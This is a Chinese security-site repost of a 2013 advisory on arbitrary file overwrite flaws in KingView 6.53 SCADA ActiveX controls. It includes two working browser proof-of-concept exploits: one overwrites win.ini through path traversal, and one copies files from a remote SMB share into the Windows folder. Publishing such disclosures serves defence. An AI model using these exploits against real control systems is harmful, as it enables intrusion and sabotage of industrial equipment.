Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / WellinTech KingView ActiveX多个任意文件覆盖漏洞

发布日期:2013-09-04
更新日期:2013-09-17受影响系统:
Wellintech KingView 6.53
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62419Kingview是亚控公司推出的第一款针对中小型项目推出的用于监视与控制自动化设备和过程的SCADA产品。KingView 6.53没有正确过滤用户输入,在实现上存在多个任意文件覆盖漏洞。攻击者可将任意文件保存在受影响应用上下文计算机上。<*来源:Blake
 
  链接:http://ics-cert.us-cert.gov/alerts/ICS-ALERT-13-256-01
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: BlakeCLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:Program FilesKingViewKChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implementedDescription: Proof of concept overwrites the win.ini file
-->
<html>
<object classid="clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC" id="target" ></object>
<script language="vbscript">arg1="..................................WINDOWSwin.ini"target.SaveToFile arg1</script><html>
<object classid="clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E" id="target"></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: BlakeCLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:Program FilesKingViewSuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p><input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
    var file1 = "\\192.168.1.165\share\poc.txt";            //source
    var file2 = "c:\WINDOWS\poc.txt";                   //destination
    result = target.ReplaceDBFile(file1,file2);
}</script>建议:
--------------------------------------------------------------------------------
厂商补丁:Wellintech
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.kingview.com/products/detail.aspx?contentid=24Moodle "external.php" PHP对象注入漏洞(CVE-2013-5674)Microsoft Internet Explorer内存破坏漏洞(CVE-2013-3846)相关资讯      KingView 
  • WellinTech KingView后门未授权访  (08/02/2012 07:04:03)
  • KingView “HistoryServer.exe”堆  (12/22/2011 19:22:30)
  • WellinTech KingView拒绝服务和目  (05/07/2012 06:13:42)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图